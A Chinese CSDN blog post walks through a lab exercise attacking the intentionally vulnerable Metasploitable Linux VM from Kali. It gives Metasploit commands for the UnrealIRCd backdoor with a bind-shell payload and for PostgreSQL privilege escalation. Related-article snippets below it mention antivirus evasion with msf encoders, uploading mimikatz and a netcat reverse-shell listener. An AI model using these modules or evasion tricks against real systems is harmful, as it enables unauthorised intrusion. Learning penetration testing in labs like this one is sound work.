MSF模拟渗透测试攻击linux实例

已于 2023-01-20 10:49:00 修改
阅读量9.7k 收藏 20
点赞数 3
分类专栏: MFS渗透测试 文章标签: 测试工具 运维开发
于 2022-04-09 16:51:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124062395
版权

MSF模拟渗透测试攻击linux实例

文章目录

前言

一、靶机metasploitable的使用

靶机MSF是一个linux的靶机漏洞平台,自身存在着很多漏洞,可以进行利用,本次就进行kali对linux的一次渗透攻击。

二、利用kali攻击linux获得会话进行提权

1.利用MSF本身存在的后门漏洞进行攻击

(1)首先下载好靶机MSF,打开kali,使用弱口令或者在百度上查询MSF的默认登录密码进行破解密码。
主机:kali
目标主机:MSF(linux)
在这里插入图片描述
登录成功后,输入ifconfig,出现ip地址192.18.222.1
(2)登录kali的MSF
使用靶机存在的后门漏洞模块
search distcc
use exploit/unix/misc/distcc_exec
在这里插入图片描述
(3)options查看参数
set rhosts 192.168.222.1
run后发现没有选择payload
在这里插入图片描述
(4)选择payload
show payloads
set payload payload/cmd/unix/bind_perl
在这里插入图片描述
发现distcc模块行不通,利用另一个模块(在百度上找的)
use exploit/unix/irc/unreal_ircd_3281_backdoor
在这里插入图片描述
show payloads
set payload payload/cmd/unix/bind_perl
设置好payload后,设置ip地址
options
set rhosts 192.168.222.1
在这里插入图片描述
(5)run,出现shell,background,输入y
输入sessions,查看会话信息
在这里插入图片描述
sessions -u 3,使用会话
使用攻击模块
use exploit/linux/postgres/postgres_payload
options
在这里插入图片描述
(6)设置ip地址,run
在这里插入图片描述
提权成功,成功进入会话。

2.使用攻击模块,进入会话,提权成功

查看id,端口信息
在这里插入图片描述
进入会话,提权成功,实验结束。

总结

本次实验是MSF攻击linux的一次渗透测试实例,利用相对应的模块进行攻击提权利用,掌握攻击linux,提权模块的使用原理。

炫彩@之星
关注
专栏目录
渗透测试流程与内网渗透测试实战
悦分享
07-15 7514
关于免杀,我使用的全部是msf的编码自免杀,64位使用的是x64/zutto_dekiru,32位使用的是x86/shikata_ga_nai,360都没有拦截。虽然靶机中有360,但是我直接上传的mimikatz也没有被杀,所以我有些怀疑是360的版本比较低,除了web服务器上传的第一个payload,其它都进行了编码处理,而第一个也确实没有执行成功,这说明360至少对第一个payload是拦截了的。
msf渗透linux教程,Metasploit后门渗透Linux系统以及跨平台后门生成
weixin_31312621的博客
05-03 1676
本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑标题:Metasploit后门渗透Linux系统以及跨平台后门生成作者:小爱_Joker难度:两级阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。攻击者IP:192.168.0.5受害者IP:192....
msf攻击(1)
clood的博客
03-20 310
msf学习
黑客入侵 linux 系统常用手段,有你不知道的没?
最新发布
2401_84215240的博客
09-30 828
Linux提权大致可分为,第三方软件漏洞、本地信任特性、内核溢出找对应的exp, 这里地址整理很齐全可以这里下命令输入pwd,这个命令是显示当前目录,先看能不能编译 gcc -help当前目录就是shell的目录,我在shell上传2.c反弹shell 到外网自己机器的12345端口上外网服务器 本地监听 nc -lvvp 12345一般都能得到一个apache交互的shell 有时候又不行这时候确定arpsniffer.c需要先装pcap和 libnet。
网络安全: Kali Linux 使用 MSF 渗透测试
cronaldo91的博客
03-05 2452
(6) 查看Kali Linux (2022.4)系统IP地址。(5)查看Kali Linux (2022.4)系统版本。(2)查看Kali Linux (2024.1)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。(1)Kali Linux (2024.1)系统版本。(2)Kali Linux (2022.4)系统版本。
在Kali Linux下利用MSF生成木马入侵同局域网下的电脑(详细版)
孟俊宇的博客
03-02 1900
本文详细的介绍了在Kali Linux下利用MSF生成木马入侵局域网下电脑的所有命令
利用Kali Linux自带的MSF进行msf17-010漏洞模块(永恒之蓝漏洞)实现远程攻击
2301_79704866的博客
02-20 1857
利用MSF永恒之蓝漏洞远程攻击教程。
Metasploit漏洞利用系列(六):MSF渗透测试 - 利用Samba服务漏洞入侵Linux主机实战
2402_86373248的博客
08-19 671
在本系列的第六篇文章中,我们将深入探究如何利用Metasploit Framework (MSF) 针对Samba服务存在的漏洞进行Linux主机的渗透测试。1. 搭建测试环境:在虚拟化环境中部署一个具有Samba服务的Linux主机,确保其版本包含已知漏洞,例如早期的Samba 3.x或4.x版本。通过Samba服务的漏洞,发送恶意数据包至目标主机,触发漏洞利用,一旦成功,将在Metasploit控制台上获得一个Meterpreter会话。根据识别到的Samba版本,选择相应的漏洞利用模块。
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4594
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
web安全渗透测试介绍与实际操作典例分析
HBohan的博客
06-23 1822
渗透测试的意义 渗透测试是站在第三者的角度来思考企业系统的安全性的,通过渗透测试可以发觉企业潜在却未纰漏的安全性问题。企业可以根据测试的结果对内部系统中的不足以及安全脆弱点进行加固以及改善,从而使企业系统变得更加安全,减低企业的风险。 渗透测试的分类 渗透测试按照渗透的方法与视角可以分为以下三类: 黑盒测试 黑盒测试(Black-box Testing)也称为外部测试(External Testing)。采用这种方式时,渗透测试团队将从一个远程网络位置来评估目标网络基础设施,并没有任何目标网络内部拓扑等相关
Kali Linux渗透测试手册:入门与实战指南
文档特别提到了Metasploit操作系统的安装和使用,Metasploit是一个广泛使用的渗透测试框架,提供了MSF终端、模块选择、攻击选项配置等实战指导。文档还鼓励学习者通过实践和实例来提升技能,并提供了相关资料的下载...
Kail Linux渗透测试实训手册
11-19
linux_kali的实战操作.emmm
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
Kali Linux渗透测试手册:虚拟机安装与Metasploit实战
这篇文档是关于Kali Linux渗透测试实践指南,主要面向初学者,旨在通过一系列具体的实例帮助读者掌握渗透测试技能。Kali Linux是著名的安全渗透测试操作系统,它继承了BackTrack的功能,并且持续更新以包含最新的...
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 3104
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
msf攻击windows实例
qq_52712762的博客
05-30 1798
环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msfmsfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)
Kali Linux渗透测试——MSF实战篇(一)
热门推荐
Captain_RB的博客
01-07 1万+
MSF学习笔记——实战篇(一)MSF学习笔记——实战篇(一)一、信息收集(一)db_nmap(二)Auxiliary模块1.arp扫描2.端口扫描3.空闲扫描4.UDP扫描5.密码嗅探6.SNMP扫描(161端口)6.SMB扫描(445端口)7.SSH扫描(22端口)8.扫描Windows缺少的补丁9.mssql扫描(TCP 1443或者UDP 1434端口)10.ftp扫描(21端口)二、漏洞扫...
项目五linux 内网完整渗透测试实例笔记
qq_56426046的博客
01-29 1970
本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。在 wdcp 生成秘钥保存下来 在 kali 设置权限 600你知道什么叫幸福嘛?幸福就是拍拍手。
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3270
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值